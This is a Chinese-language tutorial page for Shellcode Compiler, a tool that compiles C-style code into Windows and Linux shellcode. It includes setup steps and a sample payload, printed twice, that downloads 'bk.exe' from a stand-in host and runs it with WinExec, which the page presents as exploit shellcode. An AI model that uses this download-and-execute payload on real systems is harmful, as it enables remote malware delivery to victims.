首页
/ Shellcode Compiler 使用教程

Shellcode Compiler 使用教程

2024-08-10 14:23:47作者:戚魁泉Nursing

项目介绍

Shellcode Compiler 是一个创新的开源程序,它可以将 C/C++ 风格的代码编译成适用于 Windows(x86 和 x64)及 Linux(x86 和 x64)系统的精简、位置无关、NULL 字符免的 Shellcode。这个工具允许用户以友好的方式调用任何 Windows API 函数或 Linux 系统调用。Shellcode Compiler 接收源代码文件作为输入,并利用其内置的编译器解释代码,然后使用 Keystone 引擎生成汇编代码,最终汇编成二进制 Shellcode。用户可以通过简单的命令行选项定制输出,包括测试生成的 Shellcode、指定平台、控制详细输出等。

项目快速启动

安装

首先,克隆项目仓库到本地:

git clone https://github.com/NytroRST/ShellcodeCompiler.git

进入项目目录:

cd ShellcodeCompiler

编译示例

假设你有一个名为 example.c 的源代码文件,内容如下:

// example.c
function URLDownloadToFileA("urlmon.dll");
function WinExec("kernel32.dll");
function ExitProcess("kernel32.dll");
URLDownloadToFileA(0, "https://site.com/bk.exe", "bk.exe", 0, 0);
WinExec("bk.exe", 0);
ExitProcess(0);

使用 Shellcode Compiler 编译该文件:

ShellcodeCompiler.exe -r example.c -o shellcode.bin -a assembly.asm -p win_x64

这将生成 shellcode.binassembly.asm 文件。

应用案例和最佳实践

安全研究

Shellcode Compiler 可以用于编写安全漏洞的 exploit。例如,你可以编写一个简单的 Shellcode 来下载并执行一个远程文件:

function URLDownloadToFileA("urlmon.dll");
function WinExec("kernel32.dll");
function ExitProcess("kernel32.dll");
URLDownloadToFileA(0, "https://site.com/bk.exe", "bk.exe", 0, 0);
WinExec("bk.exe", 0);
ExitProcess(0);

低级别编程

在资源受限环境中执行代码时,Shellcode Compiler 可以帮助你生成高效的 Shellcode。例如,编写一个简单的 Linux Shellcode:

chmod("/root/chmodme", 511);
write(1, "Hello world", 12);
kill(1661, 9);
getpid();
execve("/usr/bin/security_tool", 0, 0);
exit(2);

典型生态项目

Keystone 引擎

Shellcode Compiler 使用了 Keystone 引擎,这是一个强大的动态二进制转换库,能够跨多个架构进行汇编语言的解析和编码。Keystone 引擎为 Shellcode Compiler 提供了强大的底层支持。

C/C++ 编译器

Shellcode Compiler 的内置编译器支持 C/C++ 风格的代码,这使得用户可以方便地编写和调试 Shellcode。C/C++ 编译器的集成使得 Shellcode Compiler 更加灵活和强大。

通过以上内容,您可以快速了解和使用 Shellcode Compiler 项目,并探索其在安全研究和低级别编程中的应用。

登录后查看全文
热门项目推荐

项目优选

收起
kernelkernel
deepin linux kernel
C
22
6
docsdocs
OpenHarmony documentation | OpenHarmony开发者文档
Dockerfile
154
1.98 K
ops-mathops-math
本项目是CANN提供的数学类基础计算算子库,实现网络在NPU上加速计算。
C++
506
42
nop-entropynop-entropy
Nop Platform 2.0是基于可逆计算理论实现的采用面向语言编程范式的新一代低代码开发平台,包含基于全新原理从零开始研发的GraphQL引擎、ORM引擎、工作流引擎、报表引擎、规则引擎、批处理引引擎等完整设计。nop-entropy是它的后端部分,采用java语言实现,可选择集成Spring框架或者Quarkus框架。中小企业可以免费商用
Java
8
0
ohos_react_nativeohos_react_native
React Native鸿蒙化仓库
C++
194
279
openHiTLSopenHiTLS
旨在打造算法先进、性能卓越、高效敏捷、安全可靠的密码套件,通过轻量级、可剪裁的软件技术架构满足各行业不同场景的多样化要求,让密码技术应用更简单,同时探索后量子等先进算法创新实践,构建密码前沿技术底座!
C
992
395
RuoYi-Vue3RuoYi-Vue3
🎉 (RuoYi)官方仓库 基于SpringBoot,Spring Security,JWT,Vue3 & Vite、Element Plus 的前后端分离权限管理系统
Vue
940
554
communitycommunity
本项目是CANN开源社区的核心管理仓库,包含社区的治理章程、治理组织、通用操作指引及流程规范等基础信息
335
11
openGauss-serveropenGauss-server
openGauss kernel ~ openGauss is an open source relational database management system
C++
146
191
金融AI编程实战金融AI编程实战
为非计算机科班出身 (例如财经类高校金融学院) 同学量身定制,新手友好,让学生以亲身实践开源开发的方式,学会使用计算机自动化自己的科研/创新工作。案例以量化投资为主线,涉及 Bash、Python、SQL、BI、AI 等全技术栈,培养面向未来的数智化人才 (如数据工程师、数据分析师、数据科学家、数据决策者、量化投资人)。
Python
75
70